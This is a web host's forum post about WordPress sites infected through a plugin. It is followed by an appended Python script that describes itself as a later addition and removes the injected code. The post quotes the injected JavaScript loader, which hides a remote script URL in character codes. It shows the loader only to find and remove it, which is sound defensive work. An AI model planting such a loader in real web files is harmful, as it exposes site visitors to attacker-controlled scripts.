I host a bunch of websites that got infected due to an insecure WordPress management plugin (InfiniteWP). I have WHM/cPanel, and ImunifyAV+ and ConfigServer Exploit Scanner. Those have failed to fully remove the injected scripts. ImunifyAV+ has removed a bunch, but for some reason, not all. Not half, even. I'm actually confused why it got some but not all. I'd even scan the entire server, and it would say it was clean, or a single user, and it's clean. But then I scan a folder I know has infection, and it finds it.
The infected files are all located in subdirectories of /home2/
There are 2 scripts that are all over the place. They inserted themselves at the beginning of a bunch of files (mostly php files). The added strings are multiple lines.
String 1:
PHP:
var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
String 2:
PHP:
var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,110,105,112,112,101,116,46,97,100,115,102,111,114,109,97,114,107,101,116,46,99,111,109,47,115,97,109,101,46,106,115,63,118,61,51); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
I'm trying to find out how to do, essentially, a find/replace inside the files to strip out those strings. I'm trying to convert those strings into a single line so grep will show them so I might figure out how to remove them with sed, so I'm replacing the line breaks with \r\n, but grep isn't finding them. Here's an example grep command I ran in a folder I know contains the string, but it found none:
Code:
grep -ir -Pzo "var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,110,105,112,112,101,116,46,97,100,115,102,111,114,109,97,114,107,101,116,46,99,111,109,47,115,97,109,101,46,106,115,63,118,61,51); s.src=pl;if (document.currentScript) {document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName('head')[0].appendChild(s);}" *
If I just search for a part of the string that's on one line (I used some of the charcode numbers), I get a ton of results.
So I want to strip out of existing files any instances of the 2 strings above, while leaving the files in place. Can anyone help? Thank you.
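One way to do the removal the post asks for, as an added example (not part of the original post and not from any of the tools it names): a Python script that builds a whitespace-tolerant pattern from the two quoted strings, so it matches with LF or CRLF line endings, and strips every occurrence. The function names and the `backup_dir` parameter are hypothetical, and accepting any digit list inside `String.fromCharCode(...)` is an assumption that goes slightly beyond the exact string quoted.

```python
import re
from pathlib import Path

# Text quoted in the post. String 2 is String 1 plus the "var pl = ..." line,
# so one pattern with an optional middle section covers both.
HEAD = (b"var gfjfgjk = 1; var d=document;var s=d.createElement('script'); "
        b"s.type='text/javascript'; s.async=true;")
TAIL = (b"if (document.currentScript) { document.currentScript.parentNode"
        b".insertBefore(s, document.currentScript); } else { "
        b"d.getElementsByTagName('head')[0].appendChild(s); }")

def loose(snippet):
    """Match snippet literally, except that each whitespace run may be any
    amount of whitespace (space, tab, LF, CRLF) or none at all."""
    return rb"\s*".join(re.escape(tok) for tok in snippet.split())

# Assumption: variants differ only in the char codes, so any digit list matches.
MIDDLE = (loose(b"var pl = String.fromCharCode(") + rb"[\d,\s]+"
          + loose(b"); s.src=pl;"))
PATTERN = re.compile(loose(HEAD) + rb"\s*(?:" + MIDDLE + rb")?\s*"
                     + loose(TAIL) + rb"(?:\r?\n)?")

def strip_injection(data):
    """Return (cleaned_bytes, number_of_blocks_removed)."""
    return PATTERN.subn(b"", data)

def clean_tree(root, backup_dir=None):
    """Report infected files under root. Files are rewritten only when
    backup_dir is given; originals are copied there first. Keep backup_dir
    outside the web root so PHP source is never served as a plain file."""
    root, hits = Path(root), {}
    for path in sorted(root.rglob("*")):
        if path.is_symlink() or not path.is_file():
            continue
        data = path.read_bytes()
        cleaned, count = strip_injection(data)
        if count == 0:
            continue
        hits[str(path.relative_to(root))] = count
        if backup_dir is not None:
            saved = Path(backup_dir) / path.relative_to(root)
            saved.parent.mkdir(parents=True, exist_ok=True)
            saved.write_bytes(data)
            path.write_bytes(cleaned)
    return hits

if __name__ == "__main__":
    import sys
    for name, count in clean_tree(sys.argv[1]).items():  # dry run only
        print(count, name)
```

Only the text quoted in the post is removed; anything else the infection added around it stays in the file, so review the dry-run list before passing `backup_dir`.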